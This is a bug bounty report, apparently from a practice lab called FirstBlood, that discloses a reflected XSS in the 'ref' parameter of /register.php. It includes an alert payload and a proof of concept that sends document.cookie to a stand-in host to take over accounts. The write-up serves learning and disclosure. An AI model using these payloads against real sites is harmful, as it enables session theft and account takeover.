FirstBlood-#153 — Reflected XSS on register.php
This issue was discovered on FirstBlood v1
On 2021-05-10, 0xblackbird Level 5 reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Hello! I found a reflected xss on /register.php. It allowed me to execute javascript on the victims behalf whenever he/she clicks on Return to previous page. I was able to escalate this to account takeover and by stealing the cookies.
Steps to reproduce
- Visit
/register.php?ref=javascript:alert(document.domain) and click on Return to previous page.
- The xss will fire and you'll see an alert box with the document domain.
- Now to prove the account takeover, I made a little proof of concept:
/register.php?ref=javascript:window.location.href=%60http://localhost/${document.cookie}%60. This little javascript PoC will redirect us to http://localhost/{cookies}. From there, the attacker can read the cookie in the server logs and takeover the victim's account with 1 click.
Impact
I was able to execute javascript on victims behalf and by that takeover his or her account completely.
Background
Thanks for your methodology, I got the idea from there that parameters get re-used. I came accross that parameter on /drpanel/logout.php and re-used it here. And to my surprise, I found out that the value reflects back in the href html tag.
Thanks! Have a nice day!
Kind regards,
0xblackbird
P3 Medium
Endpoint: /register.php
Parameter: ref
Payload: javascript:alert(document.domain)
FirstBlood ID: 16
Vulnerability Type: Reflective XSS
The parameter "ref" is vulnerable to XSS on register.php. The developers failed to filter javascript: when used on "return to previous page"
Report Feedback
Creator & Administrator
Nice find!